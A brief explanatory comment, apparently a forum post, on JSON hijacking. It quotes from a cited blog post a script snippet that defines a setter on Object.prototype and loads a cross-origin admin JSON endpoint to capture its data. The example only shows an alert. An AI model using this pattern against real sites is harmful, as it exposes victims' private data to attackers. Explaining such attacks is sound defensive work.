If the attacker knows the structure of the reply, `__defineSetter__` can be used to extract the JSON content as well. From [0]:
<script type="text/javascript">
Object.prototype.__defineSetter__('Id', function(obj){alert(obj);});
</script>
<script src="http://example.com/Home/AdminBalances">/*Boom*/</script>
[0]: http://haacked.com/archive/2009/06/25/json-hijacking.aspx/